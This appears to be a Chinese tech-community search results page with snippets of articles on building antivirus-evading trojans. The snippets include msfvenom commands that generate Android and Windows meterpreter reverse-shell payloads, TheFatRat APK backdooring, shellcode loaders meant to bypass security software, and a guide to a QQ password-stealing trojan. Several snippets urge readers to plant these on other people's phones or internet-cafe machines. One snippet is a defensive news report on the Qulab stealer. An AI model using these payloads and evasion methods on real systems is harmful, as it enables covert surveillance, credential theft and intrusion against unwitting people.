首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    红队专用免杀木马生成工具

    工具简介 一款红队专用免杀木马生成器,该工具可以通过红队人员提供的一段 shellcode 快速生成一个绕过所有杀软的可执行木马。...特点 基于Syscall进行免杀,且随机混淆,可过几乎所有杀软 内置go-strip对Go生成木马进行编译信息抹除与程序信息混淆 工具本体只有1个exe,搭配Go环境即可直接使用 工具使用 下载二进制文件...,并且在系统上安装Go语言环境,然后将shellcode保存到1个txt文件中,即可使用本工具生成免杀马。...Usage of CuiRi.exe:   -f string 通过shellcode生成免杀马   -manual 查看shellcode生成方法 支持的 shellcode 格式分为以下两种...shellcode (2) 生成免杀马 (3) 免杀效果

    1.3K20

    使用Kali生成木马入侵安卓手机

    android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk 这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功...也就是你的kali的ip地址 还有LPORT端口,刚才设置的为5555,也需要更改一下(刚才直接设置为4444也是可以的) 1.set LHOST 192.168.1.114 //这里的地址设置成我们刚才生成木马的...IP地址 2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口 3.exploit //开始执行漏洞 开始监听,等待手机上线 接下来就要发挥你的聪明才智将这个apk...装在你想监控的手机上了 红色框出的地方就说明手机上线了然后可以输入sysinfo 查看手机信息 开启摄像头之后,然后会生成两个文件,双击就可以打开了 webcam_list 查看手机有多少个摄像头

    7.1K33

    msfvenom生成后台木马监听目标(windows渗透测试)

    针对windows操作系统的渗透测试 操作过程概况:利用msf生成一个后台木马,使用exploit/multi/handler模块,通过对方打开的形式获取权限,可以进入后渗透对目标进行监听等操作。...实战: 一:后台木马生成 注意在代码中LHOST:172.16.5.2与LPORT:4444 要根据实际情况来更改 LHOST设置为渗透机的ip LPORT设置为监听的端口,端口只要不是已经占用的就可以...windows -p windows/meterpreter/reverse_tcp LHOST=172.16.5.2 LPORT=4444 -f exe -o /root/shell.exe //生成一个名为...shell的木马 二:将木马移动到目标桌面 在root目录下找到我们生成木马shell.exe然后将木马传到目标桌面 两种方法: 1.开启apache将木马上传到网页上,然后windows以访问网页的形式下载木马...重启apapche服务再次访问网页就出来了,然后下载木马文件到桌面就可以了 2.在虚拟机里安装VMware tools直接就可以把木马从kail桌面拖到windows桌面 三:运行exploit/multi

    2.8K20

    如何使用Kali生成木马入侵安卓手机

    版本阶段构建一个简单的工具来生成后门和简单的工具来张贴攻击攻击,如浏览器攻击,DLL。该工具使用流行的有效负载编译恶意软件,然后编译后的恶意软件可以在windows,android,mac上执行。...在这里我们选择第五个、意思是生成一个apk的后门,就是android的app。如图 ? 点击回车后 我们开始配置我们的本地IP地址,和监听的端口。以及放置游戏apk文件的地址,如图所示。 ?...以及放置游戏apk文件的地址,如上图出现1-6选项,我们选择3生成一个tcp的反弹链接。 然后选择2配置生成后门,我们可以看到已经有后门程序的总览。如图所示 ?...这样木马生成了,在home/Thefatrat/backdoored目录下 启动msf,配置监听模块,反弹链接,攻击机IP地址,监听端口,执行攻击exploit。

    6.5K21

    工具开发-红队免杀木马自动生成

    工具开发-红队免杀木马自动生成器 开发目的 在攻防对抗中,免杀木马是使用频率最高的东西,但是制作起来需要耗费大量时间精力,重复性工作会让人产生疲惫和厌烦 于是我决定开发一款全自动的工具,只需要双击鼠标便可以生成免杀马...linker: exec: "garble": executable file not found in %PATH% 使用方法 我这个人比较喜欢简便,因此设计开发工具时不想添加cmd运行命令和参数,主打一键化生成...更适合脚本小子宝宝的体质 文件hash 47459d679f1497fc3c5681a51cf52406 自写工具安全无后门,如被杀为杀软误报,不放心可放至虚拟机进行使用 1、cobaltstrike都有吧,生成...stageless的raw格式文件,把beacon.bin放到和生成器同一目录下,别改名字不然会生成失败 2、双击运行,不需要多余的操作,等待木马生成,成功会在当前目录下生成随机六位数的exe木马文件

    42350

    工具开发-红队免杀木马自动生成

    工具开发-红队免杀木马自动生成器 开发目的 在攻防对抗中,免杀木马是使用频率最高的东西,但是制作起来需要耗费大量时间精力,重复性工作会让人产生疲惫和厌烦 于是我决定开发一款全自动的工具,只需要双击鼠标便可以生成免杀马...linker: exec: "garble": executable file not found in %PATH% 使用方法 我这个人比较喜欢简便,因此设计开发工具时不想添加cmd运行命令和参数,主打一键化生成...更适合脚本小子宝宝的体质 文件hash 47459d679f1497fc3c5681a51cf52406 自写工具安全无后门,如被杀为杀软误报,不放心可放至虚拟机进行使用 1、cobaltstrike都有吧,生成...stageless的raw格式文件,把beacon.bin放到和生成器同一目录下,别改名字不然会生成失败 2、双击运行,不需要多余的操作,等待木马生成,成功会在当前目录下生成随机六位数的exe木马文件

    47740

    浅谈木马

    环境: 攻击者:kali 目标主机:Windows 一、了解木马 1.木马,又称为特洛伊木马 特洛伊木马(Trojan Horse),这个名字源于公元前十二世纪希腊与特洛伊之间的一场战争。...制作了一个很高很大的木马作为战神马,内部可装士兵,佯攻几天后装作无功而返,留下木马。特洛伊解围后认为自己胜利了,还看到了敌人留下的木马,便作为战利品收入城中,全城举杯庆祝。...(2)服务器端 服务器端程序 服务器端程序即木马程序,它隐藏安装在目标主机上,目标主机也称为肉鸡。 二、制作简易木马 此处我们利用msfvenom制作木马程序。...三、木马的危害 由于本文探讨木马远控,这里就暂时省略文件上传、命令执行下载木马等方式将木马传入目标主机的讨论。...木马捆绑: 制作自解压木马(准备一个木马、一个图片、一个压缩软件即可) 攻击者可以制作一个自解压木马,诱导目标解压压缩包。在目标解压压缩文件的同时会运行压缩文件里的木马程序,从而被控制。

    27320

    qq.txt tmdqq.asp qq.asp s8qq.txt .....

    /qq.txt -- 164 /tmdqq.asp -- 111 /qq.asp -- 109 /s8qq.txt -- 74 /s8tmdqq.asp -- 57 /s8qq.asp --...最重要的设置项是勾选右侧“其它高级设置”中的“获取Q币信息”,生成的盗Q木马就可以自动检测显示相应QQ号上的Q币数目了。另外还可以设置获取积分、游戏币等信息,在运行木马后删除木马文件等。...最后点击“生成木马”按钮,就可以生成一个功能超强的盗Q木马了。将生成的盗Q木马加上壳后,想办法发送给别人,或者在网吧中运行,以后就可以坐在家中等着鱼儿上钩了!...小提示在生成盗Q木马时,可以勾选“自动传送设置”项,并在下方的列表框中输入迷惑性的文件名。...比如常见木马上传文件名:明小子旁注在网站/或/bbs/下默认上传diy.asp,内容为简单的上传shell,密码为空; 再如常见qq密码信文件名:阿拉QQ大盗在网站/下默认上传tmdqq.asp,用于接收密码信并存到同路径的

    2.5K40

    YouTube出现“比特币生成器”,实则是木马传播程序

    近日油管上出现大量关于“比特币生成器”的广告宣传视频,号称该工具可为用户免费生成比特币,实际上却是一个散布Qulab信息窃取和剪贴板劫持木马的恶意行为。 ?...视频上传者 视频的内容是介绍一个号称可以免费生成比特币的工具,并附带下载链接,该工具实际上是一个木马程序,以及一个https://freebitco.in网站的链接。如图: ?...木马宣传视频 当用户点击视频中的下载链接时,会跳转到一个Setup.exe文件的下载页面。如果用户下载并运行该文件,则计算机内将会被植入Qulab木马。 ?...程序下载页面 Qulab木马 这个YouTube骗局中推送的恶意程序是Qulab信息窃取和剪贴板劫持木马。...在编译被盗数据时,木马程序会通过Telegram将其发送给攻击者,如下所示: ? 如果不幸感染了该木马,请立即更改常用账户以及网站的密码。

    1K30

    LoaderGo-快速生成免杀木马GUI版本,bypass主流杀软

    不用传到微步之类的沙箱,LoaderGo运行环境最好断网,不要被上传样本导致木马很快被杀。...生成shellcode 使用cs生成payload 这里选择C 删除多余的信息,只留\x00\x11\x99…….这些字符 加密 LoaderGo采取的是远程分离加载,我们先对原生shellcode进行加密...导入shellcode,选择加密方式,这里只写了一种,所以不用选择,直接生成即可。 将生成的文件放在云上或者vps上,为了隐匿,推荐使用oss。...这里我放到了云端上,接下来就是生成exe了 生成木马 把刚才云端的地址,填到这里 选择想要的加载方式和解密模式,这里因为只有一种加密所以这里不用选别的。...然后填上前一步生成的密钥 然后选择反沙箱模式,一般情况下选择1和3就可以,选2的话将在虚拟机里无法执行。然后点击生成即可。等待约30s即可生成到指定目录。

    49010
    领券